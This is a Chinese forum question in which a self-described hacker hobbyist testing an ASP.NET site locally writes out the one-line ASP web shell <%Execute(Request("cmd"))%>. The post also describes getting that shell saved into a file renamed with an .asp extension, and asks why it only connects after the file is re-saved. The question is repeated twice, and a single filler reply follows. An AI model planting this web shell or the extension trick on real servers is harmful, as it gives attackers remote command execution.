62,269
社区成员
发帖
与我相关
我的任务
分享很有深度的问题
我是一名黑客技术爱好者
今日我在帮人查看一套asp.net程序的漏洞,漏洞被我发现了几个,但其中有一个令我非常好奇,也无法解释,我在本地搭建测试漏洞的,我在一个新闻页面插入这样的一句话木马<%Execute(Request("cmd"))%>,本来这段代码将会保存在一个.xml文件里,但我更改保存后缀为asp (名为1.asp) 接着我查看了一下这个11.asp文件,内容为
<?xml version="1.0" encoding="gb2312"?>
<?xml-stylesheet type='text/xsl' href='glgd.xsl'?>
<root>
<title>111111</title>
<content><![CDATA[<%execute(request("cmd"))%>]]></content>
</root>
然后我连接一句话木马连接这个文件,但却连接不了,而当我把这段代码完整复制到另外一个22.asp新的文件里面后又可以用一句话木马连接这个22.asp (或者稍稍修改比如打开再保存这个11.asp文件,又可以用一句话木马连接了)
我想请老师您稍稍解释一下
今日我在帮人查看一套asp.net程序的漏洞,漏洞被我发现了几个,但其中有一个令我非常好奇,也无法解释,我在本地搭建测试漏洞的,我在一个新闻页面插入这样的一句话木马<%Execute(Request("cmd"))%>,本来这段代码将会保存在一个.xml文件里,但我更改保存后缀为asp (名为1.asp) 接着我查看了一下这个11.asp文件,内容为
<?xml version="1.0" encoding="gb2312"?>
<?xml-stylesheet type='text/xsl' href='glgd.xsl'?>
<root>
<title>111111</title>
<content><![CDATA[<%execute(request("cmd"))%>]]></content>
</root>
然后我连接一句话木马连接这个文件,但却连接不了,而当我把这段代码完整复制到另外一个22.asp新的文件里面后又可以用一句话木马连接这个22.asp (或者稍稍修改比如打开再保存这个11.asp文件,又可以用一句话木马连接了)
我想请老师您稍稍解释一下
...全文
请发表友善的回复…
发表回复
智者知已应修善业 2008-12-28
- 打赏
- 举报
回帖是一种美德!
